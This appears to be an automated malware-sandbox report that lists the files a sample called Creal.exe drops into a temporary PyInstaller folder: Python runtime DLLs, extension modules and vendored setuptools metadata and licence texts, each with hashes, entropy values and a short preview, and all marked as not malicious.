                                                                                                                                                                                                                                                      SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\libffi-8.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):39696
                                                                                                                                                                                                                                                      Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                                      MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                                      SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                                      SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                                      SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\libssl-3.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):792856
                                                                                                                                                                                                                                                      Entropy (8bit):5.57949182561317
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                                                                      MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                                                                      SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                                                                      SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                                                                      SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\pyexpat.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):201488
                                                                                                                                                                                                                                                      Entropy (8bit):6.375994899027017
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:cAPHiRwroqoLHMpCSNVysh9CV2i6P/1vTg:6wrExSU6PdvTg
                                                                                                                                                                                                                                                      MD5:CF2C3D127F11CB2C026E151956745564
                                                                                                                                                                                                                                                      SHA1:B1C8C432FC737D6F455D8F642A4F79AD95A97BD3
                                                                                                                                                                                                                                                      SHA-256:D3E81017B4A82AE1B85E8CD6B9B7EB04D8817E29E5BC9ECE549AC24C8BB2FF23
                                                                                                                                                                                                                                                      SHA-512:FE3A9C8122FFFF4AF7A51DF39D40DF18E9DB3BC4AED6B161A4BE40A586AC93C1901ACDF64CC5BFFF6975D22073558FC7A37399D016296432057B8150848F636E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P.P.P.(t..P...P...P...P...P....P..(.P.P..P....P....P......P....P.Rich.P.........................PE..d.....g.........." ...)..................................................... ............`............................................P... ............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\python3.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):70416
                                                                                                                                                                                                                                                      Entropy (8bit):6.1258200129869405
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
                                                                                                                                                                                                                                                      MD5:16855EBEF31C5B1EBE767F1C617645B3
                                                                                                                                                                                                                                                      SHA1:315521F3A748ABFA35CD4D48E8DD09D0556D989B
                                                                                                                                                                                                                                                      SHA-256:A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
                                                                                                                                                                                                                                                      SHA-512:C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\python313.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6083856
                                                                                                                                                                                                                                                      Entropy (8bit):6.126922729922386
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
                                                                                                                                                                                                                                                      MD5:B9DE917B925DD246B709BB4233777EFD
                                                                                                                                                                                                                                                      SHA1:775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
                                                                                                                                                                                                                                                      SHA-256:0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
                                                                                                                                                                                                                                                      SHA-512:F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\select.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):30992
                                                                                                                                                                                                                                                      Entropy (8bit):6.554484610649281
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
                                                                                                                                                                                                                                                      MD5:20831703486869B470006941B4D996F2
                                                                                                                                                                                                                                                      SHA1:28851DFD43706542CD3EF1B88B5E2749562DFEE0
                                                                                                                                                                                                                                                      SHA-256:78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
                                                                                                                                                                                                                                                      SHA-512:4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\LICENSE

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11358
                                                                                                                                                                                                                                                      Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                                      MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                                      SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                                      SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                                      SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\METADATA

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4648
                                                                                                                                                                                                                                                      Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                                      MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                                      SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                                      SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                                      SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\RECORD

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2518
                                                                                                                                                                                                                                                      Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                                      MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                                      SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                                      SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                                                      SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\WHEEL

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                      Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                                      MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                                      SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                                      SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                                                      SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):19
                                                                                                                                                                                                                                                      Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                                                      MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                                                      SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                                                      SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                                                      SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:importlib_metadata.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1335
                                                                                                                                                                                                                                                      Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                                                      MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                                                      SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                                                      SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                                                      SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1107
                                                                                                                                                                                                                                                      Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                                      MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                                      SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                                      SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                                      SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\METADATA

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2153
                                                                                                                                                                                                                                                      Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                                      MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                                      SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                                      SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
